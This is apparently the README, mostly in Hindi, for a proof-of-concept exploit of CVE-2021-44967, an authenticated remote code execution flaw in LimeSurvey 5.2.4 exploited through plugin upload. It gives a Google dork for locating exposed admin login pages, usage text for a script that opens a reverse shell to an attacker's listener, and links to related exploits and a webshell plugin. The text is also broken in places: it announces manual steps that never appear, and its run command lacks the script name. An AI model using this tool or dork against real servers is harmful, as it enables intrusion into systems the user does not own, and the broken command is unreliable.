
POC exploit for CVE-2021-44967
# Exploit Title: LimeSurvey 5.2.4 - Authenticated Remote Code Execution (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Discovered by: Y1LD1R1M
# Exploit Author: D3Ext
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2025
# CVE: CVE-2021-44967
लाइमसर्वे 5.2.4 में अपलोड और इंस्टॉल प्लगइन्स फंक्शन के माध्यम से एक रिमोट कोड एक्जीक्यूशन (RCE) कमजोरी मौजूद है, जो एक दूरस्थ दुर्भावनापूर्ण उपयोगकर्ता को मनमाना PHP कोड फ़ाइल अपलोड करने की अनुमति दे सकती है।
इस कमजोरी का मैन्युअल रूप से शोषण करने के लिए निम्नलिखित चरणों का पालन करें:
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]
CVE-2021-44967 - LimeSurvey Authenticated RCE
options:
-h, --help show this help message and exit
--url URL URL of the LimeSurvey web root
--user USER username to log in
--password PASSWORD password of the username
--lhost LHOST local host to receive the reverse shell
--lport LPORT local port to receive the reverse shell
--verbose enable verbose
नेटकैट लिसनर शुरू करें और फिर इस प्रकार एक्सप्लॉइट चलाएँ:
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है
कॉपीराइट © 2025, D3Ext